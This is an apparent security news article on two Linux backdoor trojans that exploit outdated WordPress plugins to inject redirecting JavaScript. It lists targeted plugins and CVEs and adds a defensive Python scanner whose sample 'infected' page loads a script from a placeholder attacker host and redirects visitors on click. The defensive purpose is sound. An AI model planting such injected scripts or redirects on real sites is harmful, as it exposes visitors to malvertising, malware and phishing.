A new Linux malware strain is making the rounds on WordPress-based websites, seeking to exploit 30 known vulnerabilities in several outdated WordPress plugins and themes. Dubbed Linux.BackDoor.WordPressExploit.1, the malware injects malicious JavaScript into target websites.
Once again, the importance of timely updates has become evident. According to Dr. Web, which discovered Linux.BackDoor.WordPressExploit.1, the trojan attempts to break into websites through 30 outdated and vulnerable plugins or themes, including WooCommerce, WP Live Chat Support Plugin, Google Code Inserter, and more (listed below).
Once the remote-controlled trojan confirms that a website runs one of the vulnerable plugins or themes, it exploits the flaw and injects into the site's pages malicious JavaScript fetched from its command and control (C2) server.
“If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server. With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first — regardless of the original contents of the page,” Dr. Web noted.
When a user clicks anywhere on an infected page, they are redirected to a website of the attackers' choosing, where they may be served malvertising, prompted to download malware, or targeted with phishing.
Linux.BackDoor.WordPressExploit.1 also includes features for switching to standby mode, shutting itself down, and pausing the logging of its actions. The malware is built for 32-bit versions of Linux but can also run on 64-bit versions.
In addition to Linux.BackDoor.WordPressExploit.1, Dr. Web also stumbled upon a variant of the same backdoor. The difference is that Linux.BackDoor.WordPressExploit.2 uses a different C2 server address, downloads the malicious JavaScript from a different domain, and targets 11 additional plugins.
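The two observable traits described above (a remotely hosted script placed so it runs before any of the page's own content, and an inline handler that redirects on any click) can be checked for in a saved copy of a page. The scanner below is an added example written for this article; it is not code from Dr. Web or from the malware report, and the sample pages, host names and URLs in it are constructed for illustration rather than real indicators.

```python
"""Heuristic scan of saved HTML for the injection pattern described in the
article: a third-party script loaded before any page content, and an inline
script that redirects the browser on any click.

Added example, not code from Dr. Web or the article.  All host names, URLs and
sample pages below are constructed placeholders, not real indicators."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-JS markers: a click handler and an assignment/navigation of location.
CLICK_RE = re.compile(r"addEventListener\(\s*['\"]click['\"]|\bonclick\s*=", re.I)
REDIRECT_RE = re.compile(
    r"\blocation(?:\.href)?\s*=|\blocation\.(?:assign|replace)\s*\(|\bwindow\.open\s*\(",
    re.I,
)

# Wrapper tags that carry no content; a script after only these is "first".
_WRAPPERS = {"html", "head", "meta", "title"}


class _ScriptScanner(HTMLParser):
    """Collect every <script> with its src, inline body and whether any
    content element was opened before it in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None
        self._seen_content = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"src": dict(attrs).get("src"), "body": "",
                             "preceded": self._seen_content}
            self.scripts.append(self._current)
        elif tag not in _WRAPPERS:
            self._seen_content = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._current = None

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data (possibly in chunks).
        if self._current is not None:
            self._current["body"] += data


def scan_page(html_text, site_hosts):
    """Return a list of findings for one page; an empty list means nothing matched.

    site_hosts: hostnames the site legitimately serves scripts from."""
    parser = _ScriptScanner()
    parser.feed(html_text)
    parser.close()
    findings = []
    for index, script in enumerate(parser.scripts, start=1):
        src = script["src"]
        if src:
            # Absolute and protocol-relative URLs have a hostname; relative paths do not.
            host = urlparse(src).hostname
            if host and host not in site_hosts and not script["preceded"]:
                findings.append(
                    f"script #{index}: third-party script {src} runs before any page content")
        body = script["body"]
        if CLICK_RE.search(body) and REDIRECT_RE.search(body):
            findings.append(f"script #{index}: inline script redirects on click")
    return findings


# Constructed sample pages (not real captures); "attacker.example" is a placeholder.
INFECTED = """<!DOCTYPE html><html><head>
<script src="https://cdn.attacker.example/loader.js"></script>
<meta charset="utf-8"><title>Shop</title>
<link rel="stylesheet" href="/wp-content/themes/t/style.css">
<script>
document.addEventListener('click', function () {
  window.location.href = 'https://landing.attacker.example/';
});
</script>
</head><body><p>Welcome</p></body></html>"""

CLEAN = """<!DOCTYPE html><html><head><meta charset="utf-8"><title>Shop</title>
<link rel="stylesheet" href="/wp-content/themes/t/style.css">
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://fonts.example.org/loader.js"></script>
</head><body><p>Welcome</p><script>console.log('ready')</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, scan_page(page, {"shop.example"}) or ["no findings"])
```

The "runs first" check deliberately ignores earlier `<script>` elements, so an injected loader placed above the site's own scripts is still reported; a script that appears only after stylesheets or body content is not, which keeps ordinary third-party embeds such as fonts or analytics out of the results. Both markers are heuristics, so a hit is a reason to compare the file against a clean copy of the theme, not proof of compromise on its own.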
Plugins and themes targeted

Targeted by both Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2:
WP Live Chat Support Plugin
WP Quick Booking Manager
WordPress – Yuzo Related Posts
Facebook Live Chat by Zotabox
Yellow Pencil Visual Theme Customizer Plugin
Blog Designer WordPress Plugin
Easysmtp
WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233)
WP GDPR Compliance Plugin
WP-Matomo Integration (WP-Piwik)
Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972)
WordPress ND Shortcodes For Visual Composer
Thim Core
WP Live Chat
Google Code Inserter
Coming Soon Page and Maintenance Mode
Total Donations Plugin
Hybrid
Post Custom Templates Lite

Targeted by Linux.BackDoor.WordPressExploit.2 only:
Brizy WordPress Plugin
FV Flowplayer Video Player
WooCommerce
WordPress Coming Soon Page
WordPress theme OneTone
Simple Fields WordPress Plugin
WordPress Delucks SEO plugin
Poll, Survey, Form & Quiz Maker by OpinionStage
Social Metrics Tracker
WPeMatico RSS Feed Fetcher
Rich Reviews plugin
“Both trojan variants have been found to contain unimplemented functionality for hacking the administrator accounts of targeted websites through a brute-force attack — by applying known logins and passwords, using special vocabularies. It is possible that this functionality was present in earlier modifications, or, conversely, that attackers plan to use it for future versions of this malware,” Dr. Web added.
The obvious mitigation is to keep WordPress core, plugins, themes and all other components up to date. Dr. Web also recommends setting strong and unique logins and passwords.